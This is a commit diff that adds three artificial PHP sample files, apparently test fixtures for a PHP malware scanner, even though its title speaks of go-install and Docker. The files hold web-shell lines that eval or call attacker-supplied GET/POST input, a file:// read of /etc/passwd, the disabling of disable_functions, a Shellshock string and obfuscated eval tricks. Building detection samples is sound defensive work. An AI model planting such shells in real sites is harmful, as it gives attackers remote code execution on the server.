Make application go-install-able and create a docker image

3 files changed, 33 insertions, 0 deletions

diff --git a/data/samples/artificial/bypasses.php b/data/samples/artificial/bypasses.php
new file mode 100644
index 0000000..9d849a4
--- /dev/null
+++ b/data/samples/artificial/bypasses.php
@@ -0,0 +1,7 @@
+<?php 
+
+// https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687
+print_r(call_user_func_array($_POST['functie'], array($_POST['argv'])));
+
+// https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734
+print_r($_POST['funct']($_POST['argv']));
diff --git a/data/samples/artificial/dodgy.php b/data/samples/artificial/dodgy.php
new file mode 100644
index 0000000..e127588
--- /dev/null
+++ b/data/samples/artificial/dodgy.php
@@ -0,0 +1,18 @@
+<?php
+
+curl_init  ( "file:///etc/parla");
+curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");
+set_magic_quotes_runtime ( 0);
+eval(base64_decode($_GET['lol']));
+$a= "SetHandler application/x-httpd-php";
+$b = "IIS://localhost/w3svc";
+include  ( 'lol.png');
+ini_get (  'disable_functions');
+ini_set("disable_functions", "");
+ini_restore("allow_url_include");
+preg_replace ("/*/e");
+$c = "env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'";
+fsockopen (  'udp://');
+call_user_func('LOL');
+$d = "<!--#exec cmd=";
+$c = "AddType application/x-httpd-php .htaccess"
diff --git a/data/samples/artificial/obfuscated.php b/data/samples/artificial/obfuscated.php
new file mode 100644
index 0000000..fc66be8
--- /dev/null
+++ b/data/samples/artificial/obfuscated.php
@@ -0,0 +1,8 @@
+<?php@eval($_GET['p'])
+<?php                                                                                                                                                assert (    $_GET['p']
+)
+$func="test";$b374k=$func('$x', 'ev'.'al')
+$b=$W('',$S);$b();
+;$pouet($pif,$paf);
+${$pouet}
+'pouet'.'pif' . 'pouet' . "lol" ."kwainkwain"